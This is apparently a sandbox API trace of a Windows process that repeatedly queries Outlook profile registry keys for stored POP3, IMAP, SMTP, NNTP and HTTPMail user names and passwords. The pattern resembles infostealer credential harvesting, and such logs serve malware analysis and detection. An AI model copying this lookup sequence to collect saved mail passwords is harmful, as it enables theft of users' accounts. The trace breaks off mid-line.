[0236.840] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\17.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x48c) returned 0x0 [0236.840] RegQueryValueExW (in: hKey=0x48c, lpValueName="IMAP Server", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.840] RegCloseKey (hKey=0x48c) returned 0x0 [0236.840] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\17.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x48c) returned 0x0 [0236.840] RegQueryValueExW (in: hKey=0x48c, lpValueName="IMAP User Name", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.840] RegCloseKey (hKey=0x48c) returned 0x0 [0236.841] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\17.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x48c) returned 0x0 [0236.841] RegQueryValueExW (in: hKey=0x48c, lpValueName="Email", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.841] RegCloseKey (hKey=0x48c) returned 0x0 [0236.841] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\17.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x48c) returned 0x0 [0236.841] RegQueryValueExW (in: hKey=0x48c, lpValueName="HTTP User", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.841] RegCloseKey (hKey=0x48c) returned 0x0 [0236.841] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\17.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x48c) returned 0x0 [0236.841] RegQueryValueExW (in: hKey=0x48c, lpValueName="HTTP Server URL", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.841] RegCloseKey (hKey=0x48c) returned 0x0 [0236.841] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\17.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x48c) returned 0x0 [0236.841] RegQueryValueExW (in: hKey=0x48c, lpValueName="POP3 User", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.841] RegCloseKey (hKey=0x48c) returned 0x0 [0236.841] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\17.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x48c) returned 0x0 [0236.842] RegQueryValueExW (in: hKey=0x48c, lpValueName="IMAP User", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.842] RegCloseKey (hKey=0x48c) returned 0x0 [0236.842] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\17.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x48c) returned 0x0 [0236.842] RegQueryValueExW (in: hKey=0x48c, lpValueName="HTTPMail User Name", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.842] RegCloseKey (hKey=0x48c) returned 0x0 [0236.842] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\17.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x48c) returned 0x0 [0236.842] RegQueryValueExW (in: hKey=0x48c, lpValueName="HTTPMail Server", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.842] RegCloseKey (hKey=0x48c) returned 0x0 [0236.842] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\17.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x48c) returned 0x0 [0236.842] RegQueryValueExW (in: hKey=0x48c, lpValueName="SMTP User", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.842] RegCloseKey (hKey=0x48c) returned 0x0 [0236.842] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\17.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x48c) returned 0x0 [0236.842] RegQueryValueExW (in: hKey=0x48c, lpValueName="POP3 Password2", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.842] RegCloseKey (hKey=0x48c) returned 0x0 [0236.843] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\17.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x48c) returned 0x0 [0236.843] RegQueryValueExW (in: hKey=0x48c, lpValueName="IMAP Password2", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.843] RegCloseKey (hKey=0x48c) returned 0x0 [0236.843] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\17.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x48c) returned 0x0 [0236.843] RegQueryValueExW (in: hKey=0x48c, lpValueName="NNTP Password2", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.843] RegCloseKey (hKey=0x48c) returned 0x0 [0236.843] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\17.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x48c) returned 0x0 [0236.843] RegQueryValueExW (in: hKey=0x48c, lpValueName="HTTPMail Password2", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.843] RegCloseKey (hKey=0x48c) returned 0x0 [0236.843] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\17.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x48c) returned 0x0 [0236.843] RegQueryValueExW (in: hKey=0x48c, lpValueName="SMTP Password2", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.843] RegCloseKey (hKey=0x48c) returned 0x0 [0236.844] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\17.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x48c) returned 0x0 [0236.844] RegQueryValueExW (in: hKey=0x48c, lpValueName="POP3 Password", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.844] RegCloseKey (hKey=0x48c) returned 0x0 [0236.844] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\17.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x48c) returned 0x0 [0236.844] RegQueryValueExW (in: hKey=0x48c, lpValueName="IMAP Password", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.844] RegCloseKey (hKey=0x48c) returned 0x0 [0236.844] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\17.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x48c) returned 0x0 [0236.844] RegQueryValueExW (in: hKey=0x48c, lpValueName="NNTP Password", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.844] RegCloseKey (hKey=0x48c) returned 0x0 [0236.844] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\17.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x48c) returned 0x0 [0236.844] RegQueryValueExW (in: hKey=0x48c, lpValueName="HTTPMail Password", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.844] RegCloseKey (hKey=0x48c) returned 0x0 [0236.844] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\17.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x48c) returned 0x0 [0236.845] RegQueryValueExW (in: hKey=0x48c, lpValueName="SMTP Password", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.845] RegCloseKey (hKey=0x48c) returned 0x0 [0236.845] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\17.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x20019, phkResult=0x615c1c8 | out: phkResult=0x615c1c8*=0x48c) returned 0x0 [0236.845] RegQueryInfoKeyW (in: hKey=0x48c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x615c1f8, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x615c1f4, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x615c1f8*=0x0, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x615c1f4*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0236.845] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\18.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x0) returned 0x2 [0236.845] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\18.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2001f, lpSecurityAttributes=0x0, phkResult=0x615c144, lpdwDisposition=0x615c1cc | out: phkResult=0x615c144*=0x488, lpdwDisposition=0x615c1cc*=0x1) returned 0x0 [0236.846] RegQueryValueExW (in: hKey=0x488, lpValueName="SMTP Email Address", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.846] RegCloseKey (hKey=0x488) returned 0x0 [0236.846] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\18.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x488) returned 0x0 [0236.846] RegQueryValueExW (in: hKey=0x488, lpValueName="SMTP Server", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.846] RegCloseKey (hKey=0x488) returned 0x0 [0236.846] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\18.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x488) returned 0x0 [0236.846] RegQueryValueExW (in: hKey=0x488, lpValueName="POP3 Server", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.846] RegCloseKey (hKey=0x488) returned 0x0 [0236.846] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\18.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x488) returned 0x0 [0236.846] RegQueryValueExW (in: hKey=0x488, lpValueName="POP3 User Name", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.846] RegCloseKey (hKey=0x488) returned 0x0 [0236.847] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\18.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x488) returned 0x0 [0236.847] RegQueryValueExW (in: hKey=0x488, lpValueName="SMTP User Name", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.847] RegCloseKey (hKey=0x488) returned 0x0 [0236.847] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\18.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x488) returned 0x0 [0236.847] RegQueryValueExW (in: hKey=0x488, lpValueName="NNTP Email Address", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.847] RegCloseKey (hKey=0x488) returned 0x0 [0236.847] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\18.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x488) returned 0x0 [0236.847] RegQueryValueExW (in: hKey=0x488, lpValueName="NNTP User Name", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.847] RegCloseKey (hKey=0x488) returned 0x0 [0236.847] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\18.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x488) returned 0x0 [0236.847] RegQueryValueExW (in: hKey=0x488, lpValueName="NNTP Server", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.847] RegCloseKey (hKey=0x488) returned 0x0 [0236.848] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\18.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x488) returned 0x0 [0236.848] RegQueryValueExW (in: hKey=0x488, lpValueName="IMAP Server", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.848] RegCloseKey (hKey=0x488) returned 0x0 [0236.848] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\18.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x488) returned 0x0 [0236.848] RegQueryValueExW (in: hKey=0x488, lpValueName="IMAP User Name", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.848] RegCloseKey (hKey=0x488) returned 0x0 [0236.848] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\18.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x488) returned 0x0 [0236.848] RegQueryValueExW (in: hKey=0x488, lpValueName="Email", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.848] RegCloseKey (hKey=0x488) returned 0x0 [0236.848] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\18.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x488) returned 0x0 [0236.848] RegQueryValueExW (in: hKey=0x488, lpValueName="HTTP User", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.848] RegCloseKey (hKey=0x488) returned 0x0 [0236.848] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\18.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x488) returned 0x0 [0236.849] RegQueryValueExW (in: hKey=0x488, lpValueName="HTTP Server URL", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.849] RegCloseKey (hKey=0x488) returned 0x0 [0236.849] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\18.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x488) returned 0x0 [0236.849] RegQueryValueExW (in: hKey=0x488, lpValueName="POP3 User", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.849] RegCloseKey (hKey=0x488) returned 0x0 [0236.849] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\18.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x488) returned 0x0 [0236.849] RegQueryValueExW (in: hKey=0x488, lpValueName="IMAP User", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.849] RegCloseKey (hKey=0x488) returned 0x0 [0236.849] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\18.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x488) returned 0x0 [0236.849] RegQueryValueExW (in: hKey=0x488, lpValueName="HTTPMail User Name", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.849] RegCloseKey (hKey=0x488) returned 0x0 [0236.849] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\18.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x488) returned 0x0 [0236.850] RegQueryValueExW (in: hKey=0x488, lpValueName="HTTPMail Server", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.850] RegCloseKey (hKey=0x488) returned 0x0 [0236.850] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\18.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x488) returned 0x0 [0236.850] RegQueryValueExW (in: hKey=0x488, lpValueName="SMTP User", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.850] RegCloseKey (hKey=0x488) returned 0x0 [0236.850] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\18.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x488) returned 0x0 [0236.850] RegQueryValueExW (in: hKey=0x488, lpValueName="POP3 Password2", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.850] RegCloseKey (hKey=0x488) returned 0x0 [0236.850] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\18.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x488) returned 0x0 [0236.850] RegQueryValueExW (in: hKey=0x488, lpValueName="IMAP Password2", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.850] RegCloseKey (hKey=0x488) returned 0x0 [0236.850] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\18.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x488) returned 0x0 [0236.850] RegQueryValueExW (in: hKey=0x488, lpValueName="NNTP Password2", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.850] RegCloseKey (hKey=0x488) returned 0x0 [0236.851] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\18.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x488) returned 0x0 [0236.851] RegQueryValueExW (in: hKey=0x488, lpValueName="HTTPMail Password2", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.851] RegCloseKey (hKey=0x488) returned 0x0 [0236.851] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\18.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x488) returned 0x0 [0236.851] RegQueryValueExW (in: hKey=0x488, lpValueName="SMTP Password2", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.851] RegCloseKey (hKey=0x488) returned 0x0 [0236.851] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\18.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x488) returned 0x0 [0236.851] RegQueryValueExW (in: hKey=0x488, lpValueName="POP3 Password", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, 